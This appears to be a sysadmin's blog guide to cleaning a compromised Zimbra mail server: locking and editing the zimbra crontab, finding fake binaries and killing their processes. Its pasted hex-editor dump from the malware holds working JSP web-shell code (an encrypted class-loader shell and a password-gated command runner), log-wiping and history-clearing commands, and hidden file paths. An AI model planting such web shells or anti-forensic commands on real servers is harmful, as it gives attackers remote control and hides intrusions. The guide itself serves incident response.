Yet another zmcat or counterpart cleaning guide for Zimbra
This zmcat derivative attack and attacker is very specialized for zimbra.Alot of files seem to be part of zimbra located different path, interestingly there isn't any unexpected files /tmp folder.And something in background clean/edit most of log files.
chattr +i /var/spool/cron/crontabs/zimbra
Then inspecting all the records not end of the lines in the crontab file.Some records looking zimbra's own services, but really it's NOT!
For example 'zmmysqlstatus' is part of zimbra but real zmmysqlstatus is a perl scipt located in /opt/zimbra/bin, fake zmmysqlstatus is in the /opt/zimbra/libexec path is a executable binary file.Filenames like zmtrainsa, zmstat etc.They can be everywhere!!
Now we are detecting suspected binary files using an hex editor like Bless. And we found something like below, include attackers lifework.
rb wb+ wb /proc/self/exe ' | awk '{print $2}' | xargs kill -9 > /dev/null 2>&1; ps aux | grep -v grep | grep ' touch -r > /dev/null 2>&1 nohup > /dev/null 2>&1 & ' / r /proc/%s %d (crontab -l |grep -v ' )|crontab - crontab -l | grep -v grep | grep ' sed -i -E '/ ( )| /d' /opt/zimbra/log/ .pid %Y/%m/%d f****************h - - chmod -R 455 /opt/zimbra/jetty/webapps/zimbra/downloads delete: %s failed! delete: %s successfully. /opt/zimbra/jetty/webapps/zimbraAdmin/public/jsp /Alert.jsp /Zimbra.jsp ")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%> <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request .getParameter(" /opt/zimbra/jetty/webapps/zimbra/public/jsp /CryptCore.jsp /Crypt.jsp " .equals( request .getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime() .exec(new String[]{"/bin/sh","-c", request .getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.print(new String(b,0,a));}out.print("</pre>");}else{out.print("</pre>");}%> <%if (" write %s: successfully. write %s: failed! %s: exist. zmstorewatch /tmp/ tor2web. wget curl /opt/zimbra/lib/libsetuid.so XZimbra\.jsp Ajax\.jsp attachment_blocked\.jsp Core Debug\.jsp static\.jsp ppwd= 66\.04 /opt/zimbra/log/*_log.20 /opt/zimbra/log/nginx.access.log history -c > /dev/null 2>&1 zmqueuelog /opt/zimbra/bin/ zmmysqlstatus /opt/zimbra/libexec/ /opt/zimbra/lib/ swatchdog zmclientcertmgr /opt/zimbra/bin zmtrainsa watchdog /opt/zimbra/common/bin/ zmstat /opt/zimbra/zmstat/ lwatchdog Hok8gxZFafGORRLCiowY_vpqNappusQV8agmQkI7wKk /tmp/.cache zmmailboxdwatch /opt/zimbra/jetty/webapps/zimbra/public/jsp/infoc.jsp /opt/zimbra/jetty/webapps/zimbra/public/jsp/BootCore.jsp /opt/zimbra/jetty/webapps/zimbra/public/jsp/ShareCore.jsp /opt/zimbra/jetty/webapps/zimbra/public/jsp/ZimbraCore.jsp /opt/zimbra/jetty/webapps/zimbra/public/jsp/Online.jsp /opt/zimbra/jetty/webapps/zimbra/public/404.jsp /opt/zimbra/conf/zmsstorewatch.cnf /opt/zimbra/conf/zmsstore.cnf /opt/zimbra/lib/zmmailboxdwatch /opt/zimbra/lib/zmstorewatch /tmp/.cache/.ntp /tmp/.cache/.kthrotlds ÿÿÿ
There is alot of payloads, system object files,binary executables, some scripts mostly appends end of your real files or completely fake .jsp files.Especially if you found some binary files start with UPX in hex editor, you are on the right way.
Now we are using 'top' command and looking for find something running background.Then check process path(real or fake) and if positive kill process
pwdx <PID> kill <PID>
Repeat this process for every suspected cron records.Notice all those file names or scripts.
All of these process running under zimbra user.You can use pkill close all zimbra process and shutdown your mail service.But you are sure nothing infected working or kill them one by one.
pkill -u zimbra
Now unlock cron file and delete unwanted lines using text editor like nano.
chattr -i /var/spool/cron/crontabs/zimbra
cp /var/spool/cron/crontabs/zimbra /var/spool/cron/crontabs/zimbra_copy nano /var/spool/cron/crontabs/zimbra
Save changes and review cron file again.If something working background it will overwrite the file.
I assume everything is okay.Now lock cron file again.
chattr +i /var/spool/cron/crontabs/zimbra
If you used pkill -u zimbra, you need to restart your mail server.
su zimbra zmcontrol restart
Check your services, they should work well.
zmcontrol status
Then delete all noticed files but not directly, copy a temp directory.Check end of .jsp files, delete infected lines.Restart your mail server, wait two minutes and check status.If everything is okay, this meaning you cleaned your servers.Then download and install patch for your installation release from here.
Lastly don't forget change password.
Comments
Display comments as Linear | Threaded